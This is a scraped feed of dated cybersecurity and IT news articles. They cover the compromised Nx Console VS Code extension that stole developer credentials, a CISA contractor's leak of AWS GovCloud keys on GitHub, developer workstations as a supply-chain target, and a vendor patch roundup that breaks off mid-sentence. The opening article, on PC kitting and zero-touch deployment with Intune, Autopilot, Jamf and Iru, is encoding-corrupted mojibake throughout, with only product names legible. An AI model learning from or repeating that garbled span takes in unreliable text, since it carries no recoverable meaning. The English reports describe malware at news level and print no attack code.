�L�b�e�B���O�͍��Ȃ��u�P����Ɓv�ƌ�����ꂪ���ł����A���ۂɂ́g�͂����u�Ԃ�����S�Ɏg����PC�h���������闠���ŁA��V�X��IT������Z�L�����e�B�A�Ɩ��p�����x���鍂�x�Ȑv�Ɖ^�p��S���Ă��܂��B�Ȃ����̉��l�͌������A�]������Ȃ��̂��B�L�b�e�B���O�̖{�����@�艺���܂��B ���̋L���͉������ł��B����o�^�i�����j����ƑS�Ă������������܂��B �@�uPC�L�b�e�B���O�Ȃ�ĒN�ł��ł���P����Ƃł��傤�H�v �@�ˑR�ł����A���̔F���͖��m�ɊԈ���Ă��܂��B�ނ���APC�L�b�e�B���O���y�����Ă���g�D�قǁAIT������Z�L�����e�B�A�Ɩ����Y���̂����ꂩ�ɉۑ������Ă���̂ł��B �@PC�L�b�e�B���O�͒P��PC����o���A�����ݒ�����A�A�v���P�[�V�����������Ƃł͂���܂���B�]�ƈ������S���X���[�Y�ɋƖ����J�n���邽�߂́A�Z�L�����e�B�E�K�o�i���X�E�Ɩ����Y���̋N�_�Ȃ̂ł��B �@�������c�O�Ȃ���A���̐��ʂ͔��Ɍ����ɂ������̂ł��B��肪�N���Ȃ����ƁA���[�U�[������Ȃ����ƁA�C���V�f���g���������Ȃ����ƁB�����͖{���A�傫�Ȑ��ʂł���ɂ�������炸�A�����N���Ă��Ȃ��悤�Ɍ����邽�߁A���l���F������ɂ����̂ł��B �@���̘A�ڂ̑�1��ł́APC�L�b�e�B���O�̖{���Ƃ��ꂪ��Ƃɂ����炷���l�A�����ď�V�X�����̉��l���Ɩ������o�c�w�ɂǂ������ׂ����ɂ��Đ������܂��B ��V�X�͍̗p�̌��ɂ߂�]���w�W�̕s�݁A�ӎv����̞B���i�����܂��j���ɂ��A���̎��͂≿�l������������ɂ����W�����}������Ă��܂��B�{�A�ڂł́A�o���̌���������c�[���I��̖{���A�w���v�f�X�N��L�b�e�B���O�̍ĕ]���A�g�ڂ�����V�X�h�̌��E�Ȃǂ�ʂ��āA�P�Ȃ�u���ł����v����E���A�����ɕ]������邽�߂̎��H�I�Ȏ��_����܂��B �@PC�L�b�e�B���O���y������l�̑����́A�u1���PC���蓮�ŃZ�b�g�A�b�v�����Ɓv���C���[�W���Ă��܂��B�Ⴆ����͈ȉ��̂悤�ȗ���ł��B �@�m���ɂ��ꂾ�����o���A����IT���e���V�[������ΑΉ��ł����ƂɌ����܂��B��������Ƃ�IT���ɂ�����L�b�e�B���O�́A���̂悤�ȒP���ȍ�Ƃł͂���܂���B�{���́u1�����邱�Ɓv�ł͂Ȃ��A��������Ԃ̒[�����A���m�ɁA��ʂɁA�����I�ɁA�Č����������āA�Z�L�����e�B���m�ۂ��Ȃ���W�J����d�g�݂���邱�Ƃɂ���܂��B �@���̈Ⴂ�𗝉����Ă��Ȃ��ƁA�L�b�e�B���O�̉��l�͉i���Ɍ����܂���B1������ƂŐݒ肷�邱�ƂƁA���\��A���S��A�ꍇ�ɂ���Ă͐����̒[�����A�����i���œW�J�������邱�Ƃ͑S���ʕ��ł��B�����ɂ͕W������v�A���A�������A��O�Ή��A�^�p���P�A�č��Ή��Ƃ����������̗v�f���܂܂�܂��B�܂�L�b�e�B���O�͒P����Ƃł͂Ȃ��A���IT�̕i�������E����G���W�j�A�����O�Ȃ̂ł��B �@���[�U�[���_�ł́uPC���͂����炷���g����v���Ƃ͓�����O�̂悤�Ɋ������邩������܂���B�������A���̓�����O�����������Փx�͔��ɍ������̂ł��B�M�҂Ƃ��Ă͂���͈ȉ��̏�����������Ă��邱�Ƃ��ƍl���܂��B �@����炪��ł�������ƁA���[�U�[�͂����ɋƖ����J�n�ł��܂���B����ɏd�v�Ȃ̂́u��肪�N���Ȃ���ԁv���ێ��������邱�Ƃł��B���^�p�ł́A�|���V�[�̋�����A�v���z�z�̎��s�AOS�A�b�v�f�[�g�Ƃ̐������A�f�o�C�X�o�^�̕s�����A���C�Z���X�s���A�l�b�g���[�N����A���[�U�[�����̖��ȂǁA���܂��܂ȃg���u������������\��������܂��B �@�����𖢑R�ɖh���A��肪����������v���Ɍ�������肵�A�Ĕ��h�~����u����K�v������܂��B�����܂łŕ��������������邩�Ǝv���܂����A����͂��͂⏉���ݒ��Ƃł͂Ȃ��A���x�Ȑv�Ɖ^�p�̗̈�ł��B �@�ŋ߂́uMicrosoft Intune�v�uWindows Autopilot�v�uMicrosoft SCCM�v�Ȃǂ����p�����[���^�b��f�v���C���嗬�ɂȂ����܂��B �@�����A�uPC���J�������炷���g�����Ԃɂ���v�Ƃ����ꌩ�V���v���ȑ̌��̗����ɂ́A�ɂ߂ĕ��G�Ȑv�����݂��܂��B�Ⴆ�[���^�b��f�v���C�𐬗�������ɂ́A�l�b�g���[�N��ID��ՁAMDM�A���C�Z���X�A�A�v���P�[�V�����z�z�A���O�A�č��Ƃ����������̗̈悪���f�I�Ɋւ��܂��B �@��̓I�ɂ̓v���L�V��VPN�i���z�v���C�x�[�g�l�b�g���[�N�j�ASASE�iSecure Access Service Edge�j�Ȃǂ̃l�b�g���[�N�v�A�uActive Directory�v��uMicrosoft Entra ID�v���܂�ID��ՁAMicrosoft Intune�Ȃǂ�MDM�|���V�[�A�uMicrosoft 365�v��e��SaaS�̃��C�Z���X�Ǘ��A�Ɩ��A�v���P�[�V�����̔z�z�v�AEDR�iEndpoint Detection and Response�j�⎑�Y�Ǘ��c�[���̓����A���O�擾��č��ؐՂ̐v�Ȃǂł��B �@����ɁA������P�ɍ\������悢�킯�ł͂���܂���B�N���A�ǂ̃^�C�~���O�ŁA�ǂ̌����ŗ��p�ł���̂��B�ǂ̕���ɁA�ǂ̃A�v���P�[�V������z�z����̂��B�Z�L�����e�B�|���V�[�͂ǂ̗��x�œK�p����̂��B����Z�b�g�A�b�v�Ɏ��s�����ꍇ�A�ǂ̂悤�ɐ�߂��̂��B�ސE����ٓ����ɁA�[����f�[�^���ǂ̂悤�ɊǗ�����̂��B���������u�^�p��O��Ƃ����v�v���s���ł��B �@�܂�A�[���^�b��f�v���C�͒P�Ȃ鎩�����ł͂���܂���B�g��Ƃ�IT�������̂��̂��R�[�h������s�ׁh�Ȃ̂ł��B �@�[���^�b��f�v���C�͎�ɁuWindows�v�̕����Ō���܂����A���ꂾ���ł͂���܂���B���ۂɂ́umacOS�v�ɂ����Ă����l�A���邢�͂���ȏ�ɍ��x�Ȑv�����߂��܂��B�Ⴆ�uJamf Pro�v��uIru�v�i��Kandji�j�Ƃ�����MDM�����p�����[���^�b��f�v���C�ł́A�P�Ȃ鏉���ݒ�̎������ł͂Ȃ��|���V�[�ƃX�N���v�g�ɂ���Ԑ��䂪���j�ƂȂ�܂��B �@macOS�́u�����I�Ŏg���₷���v�Ƃ����C���[�W����������A��Ɗ��ɂ����ẮA�ނ���v��Փx�������̈�ł�����܂��B�M�҂͂��̗��R���ȉ��̂悤�ɍl���Ă��܂��B �@�Ⴆ��Accessibility������t���f�B�X�N�A�N�Z�X�A��ʎ��^�A�ʒm�A�V�X�e���g���A�l�b�g���[�N�g���ȂǁA�Z�L�����e�B���i��Ɩ��A�v��������ɓ��삷�邽�߂ɕK�v�Ȍ����͑���ɂ킽��܂��B������K�ɐv���Ă��Ȃ��Ɓu�A�v���P�[�V�����̓C���X�g�[������Ă���̂ɐ���ɓ��삵�Ȃ��v�uEDR�������Ă���̂Ɋ��҂����ی삪�ł��Ȃ��v�u���[�U�[�Ɏ蓮������˗����Ȃ���Ȃ�Ȃ��v�Ƃ������s���S�ȏ�ԂɊׂ�܂��B �@�܂�AmacOS�̃[���^�b����܂��A�P�ɁumacOS�������ݒ肷���Ɓv�ł͂Ȃ���ƂƂ��ĊǗ��\�ȏ�Ԃ���邽�߂̐v�Ɩ��Ȃ̂ł��B �@macOS�̃L�b�e�B���O�œ����I�Ȃ̂́A������̃C���[�W��z��̂ł͂Ȃ��A�|���V�[�ɂ���Ē[���̏�Ԃ��p���I�ɒ�����i����ׂ���Ԃ��ێ���������j�Ƃ����l�����ł��B �@�Ⴆ��Jamf Pro�ł́A�|���V�[�ɂЂ��t�����X�N���v�g���s��p�b�P�[�W�z�z�A���O�C�������F�b�N�C�����̃g���K�[�A�\���v���t�@�C���̓K�p�Ȃǂ�g�ݍ��킹�邱�ƂŒ[���̏�Ԃ𐧌䂵�܂��B �@�P�Ɂu�A�v��������v�����ł͂Ȃ��u�Z�L�����e�B�ݒ����������v�u�s�v�Ȑݒ�ύX���������Ȃ��v�u���[�J�����̐�������ۂv�u�ݒ�̃h���t�g���C������v�u��������ɉ����ăX�N���v�g�����s����v�u���[�U�[�̑�����ŏ����ɂ��ċƖ��J�n�܂ŗU������v�Ƃ������d�g�݂�����K�v������܂��B �@�Ⴆ�A�Z�L�����e�B�G�[�W�F���g��z�z���邾���łȂ��A�K�v�Ȍ������t�^����Ă��邩�ǂ������m�F���A���K�p�ł���ΏC������B�܂��́A����̃A�v���P�[�V�������C���X�g�[������Ă��邩�ǂ������m�F���A�Ȃ���Δz�z����B�ݒ�t�@�C����ؖ������������z�u����Ă��邩�ǂ������m�F����Ƃ��������̂ł��B �@����ɑ���Iru�������I�Ȃ̂́ABlueprint�Ƃ����T�O�ł��BBlueprint�Ƃ́A�[���̂���ׂ��\�����e���v���[�g�Ƃ��Ē����A������f�o�C�X�ɓK�p����d�g�݂ł��B�����ŏd�v�Ȃ̂́A�P��̃e���v���[�g��S�[���ɓK�p����̂ł͂Ȃ��A�f�o�C�X��ʂ⏊������A���p�p�r�A���X�N���x���ɉ����ăe���v���[�g�̎�ނ���v�v�z�ł��B�Ⴆ�A���̂悤�ȕ��������l�����܂��B �@���ꂼ��ɕK�v�ȃA�v���P�[�V������Z�L�����e�B�ݒ�AOS����A�X�N���v�g���s�A���������͈قȂ�܂��B�J���҂ɂ͈��̎��R�x���K�v�Ȉ���ŁA�o����l���ȂNj@��������������ł́A��苭�����䂪�K�v�ł��傤�B��E�҂�Ǘ��Ҍ����������[�U�[�ɂ͒lj��̃Z�L�����e�B���䂪���߂���ꍇ������܂��BBlueprint�̐v�����ƁA�ߏ�Ȑ���ɂ���ċƖ������𗎂Ƃ����Ƃ�����A����s���ɂ���ă��X�N�����߂邱�Ƃ�����܂��B �@Blueprint�͒P�Ȃ�Z�b�g�A�b�v�e���v���[�g�ł͂���܂���BIT�K�o�i���X�̐v�}���̂��̂Ȃ̂ł��B �@��Ɗ��ł�Windows��macOS�����݂��Ă���P�[�X����ʓI�ł��B �@Windows��Microsoft Intune��Autopilot�ŁAmacOS��Jamf Pro��Iru�ŊǗ�����Ƃ������\���͒���������܂���B�����������ŏd�v�Ȃ̂́A�c�[����������Ă��Ă��A�����̍l�����܂ŕ��f���Ă͂����Ȃ��Ƃ������Ƃł��BWindows�ɂ�Windows�̊Ǘ���@������AmacOS�ɂ�macOS�̊Ǘ���@������܂��B��������ƂƂ��Ď������������Ƃ͈ȉ��̂悤�ɋ��ʂ��Ă��܂��B �@�܂�A�L�b�e�B���O��Windows��macOS���Ƃ����ʃc�[���̘b�ł͂���܂���B�f�o�C�X�Ǘ��ł͂Ȃ���ƑS�̂̓����v�̖��ł��B�����ŏd�v�ɂȂ�̂́A�|���V�[�v�z�̓����O�E�č��̈ꌳ���AID�x�[�X�̃A�N�Z�X����A���C�t�T�C�N���Ǘ��A��O�^�p�̃��[�����ł��B �@�������A�����܂œǂ�Łu�Ȃ�قǁA�L�b�e�B���O�͍��x�Ȑv�Ɩ��Ȃ̂��v�Ɨ����ł��Ă��A�����ɂ͂Ȃ��A�����̊�Ƃł��̉��l�͏\���ɕ]������Ă��܂���B�ނ���A�u��肪�N���Ȃ����Ɓv��������O�ƌ��Ȃ���邱�ƂŁA�L�b�e�B���O�́g�����Ȃ��d���h�Ƃ��Ĉ���ꂪ���ł��B �@�������ۂɂ́A�L�b�e�B���O�̕i���̓Z�L�����e�B���̂���������A�č��Ή��A�]�ƈ��̐��Y���A����ɂ�IT����ւ̐M�����ɂ܂Œ������܂��B����́A�Ȃ��L�b�e�B���O���y������₷���̂��A�����ď�V�X�͂��̉��l���o�c�w��Ɩ�����ɂǂ������ׂ��Ȃ̂��ɂ��Č@�艺���܂��B NetworkEngineer�AServerEngineer���o�āA�O���n�x���_�[��SIer�y�юГ��V�X�e��Engineer���o���B���̌�Afreee������ЂɊm����IPO�����̂��߁A�R�[�|���[�gIT����̗����グ�̐ӔC�҂Ƃ��ĎQ��B���Ђł́AITEngineer�����߂Ȃ���CSIRT���������A�Z�L�����e�B���������{�B���݂́A�o�����G���X�e�N�m���W�[�Y������Ђ̎��s����CIO/CISO�A���V�X�e������/�R�[�|���[�g�G���W�j�A�B�܂��A���Ђł̋Ɩ��ϑ���IT�ږ�Ȃǂ��S��ISMS��P�}�[�N�擾��X�V�A�č��Ή������Ή��B Copyright © ITmedia, Inc. All Rights Reserved.
atmarkit.itmedia.co.jpMay 19, 2026extracted
Compromised Nx Console 18.95.0 Targeted VS Code Developers with Credential Stealer
Cybersecurity researchers have flagged a compromised version of the Nx Console extension that was published to the Microsoft Visual Studio Code (VS Code) Marketplace. The extension in question is rwl.angular-console (version 18.95.0), a popular user interface and plugin for code editors like VS Code, Cursor, and JetBrains. The VS Code extension has more than 2.2 million installations. "Within seconds of a developer opening any workspace, the compromised extension silently fetched and executed a 498 KB obfuscated payload from a dangling orphan commit hidden inside the official nrwl/nx GitHub repository," StepSecurity researcher Ashish Kurmi said. The payload is a "multi-stage credential stealer and supply chain poisoning tool" that harvests developer secrets and exfiltrates them via HTTPS, the GitHub API, and DNS tunneling. It also installs a Python backdoor on macOS systems that abuses the GitHub Search API as a dead drop resolver for receiving further commands. In an advisory issued Monday, the maintainers of the extension said the root cause has been traced to one of its developers, whose machine was compromised in a recent security incident that leaked their GitHub credentials. Although the nature of the prior "incident" was not disclosed, the developer's credentials have since been temporarily revoked. The access afforded by the credentials is said to have been abused to push an orphaned, unsigned commit to nrwl/nx, which introduces the stealer malware. The malicious action is triggered as soon as a developer opens any workspace in VS Code, leading to the installation of the Bun JavaScript runtime to run an obfuscated "index.js" payload. The malware runs checks to avoid infecting machines likely located in the Russian/CIS time zones and launches itself as a detached background process to kick off the credential harvesting workflow, allowing it to retrieve sensitive data from 1Password vaults and Anthropic Claude Code configurations, and secrets associated with npm, GitHub, and Amazon Web Services (AWS). "One capability that stands out: the payload contains full Sigstore integration, including Fulcio certificate issuance and SLSA provenance generation," StepSecurity said. "Combined with stolen npm OIDC tokens, this means the attacker could publish downstream npm packages with valid, cryptographically signed provenance attestations, making the malicious packages appear as legitimate, verified builds." The Nx team also acknowledged a "few users were compromised" as a result of this breach. Besides urging users to update to 18.100.0 or later, the maintainers have published the following indicators of compromise - Nx Console version 18.95.0 was installed during the exposure window between May 18, 2026, at 2:36 p.m. CEST and 2:47 p.m. CEST. Presence of files like ~/.local/share/kitty/cat.py, ~/Library/LaunchAgents/com.user.kitty-monitor.plist, /var/tmp/.gh_update_state, or /tmp/kitty-*. Presence of any of the following running processes: a python process running cat.py and a process with __DAEMONIZED=1 in its environment. Affected users are recommended to terminate the aforementioned processes, delete artifacts on disk, and rotate all credentials reachable from the affected machine, including tokens, secrets, and SSH keys. The development marks the second time the Nx ecosystem has been targeted within a year. In August 2025, several npm packages were infected by a credential stealer as part of a supply chain attack campaign named s1ngularity. Unlike the previous iteration, the latest attack targets the VS Code extension. Malicious npm Packages Galore The findings coincide with the discovery of various malicious packages in the open-source repositories - iceberg-javascript, supabase-javascript, auth-javascript, microsoft-applicationinsights-common, and ms-graph-types: Five npm packages containing a hidden ELF binary that backdoors Claude Code sessions to steal developer credentials. noon-contracts: an npm package that impersonates a Noon Protocol smart contract SDK to exfiltrate SSH keys, crypto wallet private keys, AWS credentials, Kubernetes secrets, all .env files, shell history, Docker/Git/npm tokens, and browser wallet storage paths. martinez-polygon-clipping-tony: a trojanized fork of martinez-polygon-clipping that uses a postinstall hook to download a 17MB PyInstaller-packed Windows remote access trojan (RAT) that uses Telegram for command-and-control (C2) for remote shell execution, screenshot capture, file upload/download, and arbitrary Python execution. common-tg-service: an npm package that contains functionality to take over a victim's Telegram account while masquerading as "Common Telegram service for NestJS applications." exiouss: an npm package that bundles a ChatGPT and OpenAI session cookie stealer targeting web browsers like Google Chrome, Microsoft Edge, and Brave. k8s-pod-checker, dev-env-setup, and node-perf-utils: three npm packages part of the kube-health-tools cluster that install a large language model (LLM) proxy service on the victim's machine, allowing the attacker to route LLM traffic through the compromised server A coordinated credential harvesting campaign orchestrated by an Indonesian-speaking threat actor using a set of 38 npm packages that leverages dependency confusion as a way to trick CI/CD pipelines to resolve malicious public packages ahead of legitimate private ones associated with Apple, Google, and Alibaba, among others. An unusual campaign wherein seven npm packages under the @hd-team organization have been found to act as a stager for configurations used by a Chinese sports gambling and pirated streaming platform named Douqiu to determine the backend servers to connect to. Update On May 20, 2026, the Nx team disclosed that it's working with Microsoft and GitHub to understand the impact following the publication of the malicious Nx Console version 18.95.0 by unknown threat actors. "Initially, Microsoft indicated to us that there were 28 installs of the malicious version 18.95.0," Jeff Cross, co-founder of Narwhal Technologies, the company behind nx.dev, said. "Based on our own analytics for the compromised version, we currently believe the number of users who received the malicious package may be significantly higher; potentially over 6,000 installs." All the installs originated from VS Code, according to an updated advisory. As many as 41 installs came from the Open VSX registry. Nx Console Hack Stemmed from TanStack Supply Chain Attack In a fresh update shared on May 21, 2026, the Nx team officially acknowledged that one of its developers was compromised by a recent supply chain compromise targeting TanStack, causing their GitHub credentials to be leaked. "This allowed the attacker to run workflows on our GitHub repository as a contributor," the maintainers said. In a post-mortem published on May 21, 2026, the Nx team warned that anyone who had Nx Console with auto-update enabled during the exposure window should assume compromise. The malicious version was published on May 18, 2026, between 12:30 and 1:09 p.m. UTC. The extension was live in the Visual Studio Marketplace package for about 11 minutes and nearly 36 minutes in Open VSX. "The attacker published the malicious version as a legitimate Nx core contributor," the maintainers said. "A credential-stealing payload that arrived through the TanStack supply-chain compromise had silently exfiltrated that contributor's GitHub CLI OAuth token seven days earlier. Between credential theft on May 11 and the marketplace publish on May 18, the attacker was active in our GitHub repos for seven days without detection." Following the incident, the Nx team has rolled out a number of changes, including requiring approval to publish Nx Console, enhanced monitoring GitHub audit log for suspicious events, for example workflow-run deletions, and pinning GitHub Action SHAs instead of floating refs (e.g., @v6, @main) across all repositories.
thehackernews.comMay 19, 2026extracted
CISA Admin Leaked AWS GovCloud Keys on Github
Until this past weekend, a contractor for the Cybersecurity & Infrastructure Security Agency (CISA) maintained a public GitHub repository that exposed credentials to several highly privileged AWS GovCloud accounts and a large number of internal CISA systems. Security experts said the public archive included files detailing how CISA builds, tests and deploys software internally, and that it represents one of the most egregious government data leaks in recent history. On May 15, KrebsOnSecurity heard from Guillaume Valadon, a researcher with the security firm GitGuardian. Valadon’s company constantly scans public code repositories at GitHub and elsewhere for exposed secrets, automatically alerting the offending accounts of any apparent sensitive data exposures. Valadon said he reached out because the owner in this case wasn’t responding and the information exposed was highly sensitive. The GitHub repository that Valadon flagged was named “Private-CISA,” and it harbored a vast number of internal CISA/DHS credentials and files, including cloud keys, tokens, plaintext passwords, logs and other sensitive CISA assets. Valadon said the exposed CISA credentials represent a textbook example of poor security hygiene, noting that the commit logs in the offending GitHub account show that the CISA administrator disabled the default setting in GitHub that blocks users from publishing SSH keys or other secrets in public code repositories. “Passwords stored in plain text in a csv, backups in git, explicit commands to disable GitHub secrets detection feature,” Valadon wrote in an email. “I honestly believed that it was all fake before analyzing the content deeper. This is indeed the worst leak that I’ve witnessed in my career. It is obviously an individual’s mistake, but I believe that it might reveal internal practices.” One of the exposed files, titled “importantAWStokens,” included the administrative credentials to three Amazon AWS GovCloud servers. Another file exposed in their public GitHub repository — “AWS-Workspace-Firefox-Passwords.csv” — listed plaintext usernames and passwords for dozens of internal CISA systems. According to Caturegli, those systems included one called “LZ-DSO,” which appears short for “Landing Zone DevSecOps,” the agency’s secure code development environment. Philippe Caturegli, founder of the security consultancy Seralys, said he tested the AWS keys only to see whether they were still valid and to determine which internal systems the exposed accounts could access. Caturegli said the GitHub account that exposed the CISA secrets exhibits a pattern consistent with an individual operator using the repository as a working scratchpad or synchronization mechanism rather than a curated project repository. “The use of both a CISA-associated email address and a personal email address suggests the repository may have been used across differently configured environments,” Caturegli observed. “The available Git metadata alone does not prove which endpoint or device was used.” Caturegli said he validated that the exposed credentials could authenticate to three AWS GovCloud accounts at a high privilege level. He said the archive also includes plain text credentials to CISA’s internal “artifactory” — essentially a repository of all the code packages they are using to build software — and that this would represent a juicy target for malicious attackers looking for ways to maintain a persistent foothold in CISA systems. “That would be a prime place to move laterally,” he said. “Backdoor in some software packages, and every time they build something new they deploy your backdoor left and right.” In response to questions, a spokesperson for CISA said the agency is aware of the reported exposure and is continuing to investigate the situation. “Currently, there is no indication that any sensitive data was compromised as a result of this incident,” the CISA spokesperson wrote. “While we hold our team members to the highest standards of integrity and operational awareness, we are working to ensure additional safeguards are implemented to prevent future occurrences.” A review of the GitHub account and its exposed passwords show the “Private CISA” repository was maintained by an employee of Nightwing, a government contractor based in Dulles, Va. Nightwing declined to comment, directing inquiries to CISA. CISA has not responded to questions about the potential duration of the data exposure, but Caturegli said the Private CISA repository was created on November 13, 2025. The contractor’s GitHub account was created back in September 2018. The GitHub account that included the Private CISA repo was taken offline shortly after both KrebsOnSecurity and Seralys notified CISA about the exposure. But Caturegli said the exposed AWS keys inexplicably continued to remain valid for another 48 hours. CISA is currently operating with only a fraction of its normal budget and staffing levels. The agency has lost nearly a third of its workforce since the beginning of the second Trump administration, which forced a series of early retirements, buyouts, and resignations across the agency’s various divisions. The now-defunct Private CISA repo showed the contractor also used easily-guessed passwords for a number of internal resources; for example, many of the credentials used a password consisting of each platform’s name followed by the current year. Caturegli said such practices would constitute a serious security threat for any organization even if those credentials were never exposed externally, noting that threat actors often use key credentials exposed on the internal network to expand their reach after establishing initial access to a targeted system. “What I suspect happened is [the CISA contractor] was using this GitHub to synchronize files between a work laptop and a home computer, because he has regularly committed to this repo since November 2025,” Caturegli said. “This would be an embarrassing leak for any company, but it’s even more so in this case because it’s CISA.”
krebsonsecurity.comMay 18, 2026extracted
Developer Workstations Are Now Part of the Software Supply Chain
Supply chain attackers are not only trying to slip malicious code into trusted software. They are trying to steal the access that makes trusted software possible. Recently, three separate campaigns hit npm, PyPI, and Docker Hub in a 48-hour window, and all three targeted secrets from developer environments and CI/CD pipelines, including API keys, cloud credentials, SSH keys, and tokens. This is an ongoing concern and is self-propagating, as seen in attacks like the "mini Shai Hulud" campaigns. That pattern should change how security teams think about the software supply chain. Traditionally, security focused on shared systems like source code repositories, CI/CD platforms, artifact registries, package managers, and cloud environments. The goal was to protect production workloads and data. We absolutely still need to focus on these areas, but it is an incomplete picture. Modern software delivery begins before code reaches Git. It begins on the developer workstation, where code is written, dependencies are installed, credentials are tested, AI assistants are prompted, containers are built, and trusted actions begin. Developer workstations are a real part of the software supply chain. Treating them as 'just' ordinary endpoints leaves gaps among endpoint security, identity security, application security, and supply chain governance. Supply Chain Attacks Have Become Credential-Harvesting Operations Recent incidents keep pointing to the same operational truth. Attackers may use poisoned packages, compromised images, dependency bots, malicious workflows, or vulnerable developer tools, but the recurring objective is access. Events like the TeamPCP and Shai-Hulud campaigns show how supply chain attacks increasingly converge around credential theft. In the TeamPCP campaign, attackers used compromised packages and developer tooling to harvest tokens, cloud credentials, SSH keys, npm configuration files, and environment variables. Shai-Hulud pushed the same pattern even further, turning infected developer environments into credential collection points that exposed thousands of secrets across GitHub, cloud services, package registries, and internal systems. That is not just software tampering. It is credential collection at the points where developers and automation already hold trust. The supply chain is exposed when attackers gain access to credentials and context that allow them to alter, publish, build, deploy, or impersonate trusted software systems. Packages altered and published in a modern supply chain attack remain live for hours, while automation tools merge malicious updates in minutes. The common thread across many of the recent attacks has been secrets, either as an initial access vector or as the target of collection. The Attacker Path Now Runs Through Developer-Side Context The developer workstation is valuable because it concentrates context. It often contains local repositories, .env files, shell history, SSH keys, package manager credentials and configs, build scripts, debugging logs, and browser sessions. Those pieces become far more dangerous when viewed together. A single access token may look limited in isolation. A token found next to a Git remote, deployment script, README, cloud profile, and CI configuration tells an attacker where the token fits and what it might unlock. In the Shai-Hulud 2.0 campaign, for example, GitHub credentials dominated the exposed and exfiltrated credentials, each with potential admin access to repositories and CI workflows. Local compromise is not only a device problem. It can serve as a map for source control, cloud accounts, package publishing workflows, CI/CD systems, internal APIs, and production-adjacent infrastructure. Developer Machines Concentrate Software Delivery Authority A standard employee laptop may expose corporate data. A developer workstation may expose the ability to change software. That distinction is critical when considering endpoint security. Developers often need broad access to do their jobs. They clone private repositories, authenticate to cloud services, publish packages, access staging environments, and interact with multiple internal tools. Their machines become a working intersection of source code, credentials, automation, and delivery authority. While not every developer has production access, many do have enough access to influence the systems that eventually produce production outcomes. A registry token can affect packages. A GitHub token can affect repositories or workflows. A cloud profile can expose infrastructure. A CI/CD credential can affect build behavior. The board and auditors do not care if a developer stored a secret locally. The business risk is really that a local exposure gives attackers a path into systems that build, modify, release, or operate software. That shift changes the questions security teams should ask: Can you identify which credentials are usable from developer workstations? Can you limit the value and lifetime of those credentials? Can you detect sensitive material before it enters Git history, CI logs, tickets, artifacts, or chat? Can you revoke and rotate access quickly when you suspect workstation compromise? Can you tell the difference between low-impact local exposure and credentials with admin-like privilege? Those questions sit between AppSec, endpoint, identity, platform, and cloud security. However your organization chooses to coordinate, you must understand how developer behavior connects to delivery systems. Automation And AI Make The Exposure Surface Thinner And Faster Automation has compressed the time between compromise and impact. Dependency update bots can open and merge changes quickly. CI/CD systems can execute trusted workflows automatically. Package managers can run installation scripts. AI agents and coding assistants can read files, call tools, generate commands, inspect output, and move context across systems. Automation is not inherently unsafe, but typically, any automation inherits trust, especially if it comes in an agentic form. If a malicious dependency update appears routine, an automated workflow may move it forward faster than a human reviewer can understand what happened. AI In The Loop AI-assisted development adds another set of handoff points. Sensitive data can appear in prompts, terminal output, tool calls, generated code, agent memory, logs, and local configuration copied into a debugging session. The issue is broader than whether a model provider stores prompts. The larger issue is that local development context now flows through more semi-automated systems. Security teams should evaluate AI coding risk through the same lens they use for supply chain risk. Teams need to answer: what sources and data can the tool read? What can it execute? Where does output go? What credentials are nearby? And, maybe most importantly, what trust does the workflow inherit? Downstream Controls Still Matter, But They Are Too Late By Themselves Repository scanning, branch protection, CI/CD policy, artifact signing, dependency analysis, and runtime controls remain essential. They create shared enforcement points and help teams govern software at scale. The problem is now timing, thanks to the speed of modern attacks. Attackers now leverage AI-powered tools to exploit any and all secrets within seconds of discovery. Guardrails reduce potential exposure and the blast radius. Catching sensitive material while a developer is editing a file, preparing a commit, running a local command, installing a dependency, or interacting with an AI assistant keeps the impact to a minimum. Mature programs distinguish between actions that should be blocked, actions that should give warnings, and actions that should merely generate telemetry for deeper investigation. The goal is not to bury developers in friction. Treat The Workstation As A Local Supply Chain Boundary The modern software supply chain does not start when code is pushed. It starts where code, credentials, automation, and trust first come together. It is time to treat the developer workstation as a local supply chain boundary. That boundary includes the IDE, terminal, Git client, package manager, container tooling, cloud CLI, local build system, secrets handling practices, AI assistants, and automation agents. It is the place where individual developer action becomes organizational software delivery risk.
thehackernews.comMay 18, 2026extracted
Ivanti, Fortinet, SAP, VMware, n8n Patch RCE, SQL Injection, Privilege Escalation Flaws
Ivanti, Fortinet, n8n, SAP, and VMware have released security fixes for various vulnerabilities that could be exploited by bad actors to bypass authentication and execute arbitrary code. Topping the list is a critical flaw impacting Ivanti Xtraction (CVE-2026-8043, CVSS score: 9.6) that could be exploited to achieve information disclosure or client-side attacks. "External control of a file name in Ivanti Xtraction before version 2026.2 allows a remote authenticated attacker to read sensitive files and write arbitrary HTML files to a web directory, leading to information disclosure and possible client-side attacks," Ivanti said in an advisory. Fortinet published advisories for two critical shortcomings affecting FortiAuthenticator and FortiSandbox, FortiSandbox Cloud, and FortiSandbox PaaS that could result in code execution - CVE-2026-44277 (CVSS score: 9.1) - An improper access control vulnerability in FortiAuthenticator that may allow an unauthenticated attacker to execute unauthorized code or commands via crafted requests. (Fixed in FortiAuthenticator versions 6.5.7, 6.6.9, and 8.0.3) CVE-2026-26083 (CVSS score: 9.1) - A missing authorization vulnerability in FortiSandbox, FortiSandbox Cloud, and FortiSandbox PaaS WEB UI that may allow an unauthenticated attacker to execute unauthorized code or commands via HTTP requests. (Fixed in FortiSandbox versions 4.4.9 and 5.0.2, FortiSandbox Cloud version 5.0.6, and FortiSandbox PaaS versions 4.4.9. and 5.0.2) SAP also shipped fixes for two critical vulnerabilities - CVE-2026-34260 (CVSS score: 9.6) - An SQL injection vulnerability in SAP S/4HANA CVE-2026-34263 (CVSS score: 9.6) - A missing authentication check in the SAP Commerce cloud configuration "The vulnerability is caused by an overly permissive security configuration with improper rule ordering, allowing an unauthenticated user to perform malicious configuration upload and code injection, resulting in arbitrary server-side code execution," Onapsis said about CVE-2026-34263. On the other hand, CVE-2026-34260 could be exploited by an attacker to inject malicious SQL statements and potentially impact the confidentiality and availability of the application. However, since the affected code only allows read access to data, the vulnerability does not compromise the integrity of the application. "It allows a low-privileged, authenticated attacker to inject malicious SQL code via user-controlled input, potentially exposing sensitive database information and crashing the application," Pathlock said. Patches have also been released by Broadcom for a high-severity flaw in VMware Fusion (CVE-2026-41702, CVSS score: 7.8) that could pave the way for local privilege escalation. The issue has been addressed in version 26H1. "VMware Fusion contains a TOCTOU (Time-of-check Time-of-use) vulnerability that occurs during an operation performed by a SETUID binary," Broadcom said. "A malicious actor with local non-administrative user privileges may exploit this vulnerability to escalate privileges to root on the system where Fusion is installed." Round off the list is a set of five critical vulnerabilities impacting n8n - CVE-2026-42231 (CVSS score: 9.4) - A vulnerability in the xml2js library used to parse XML request bodies in n8n's 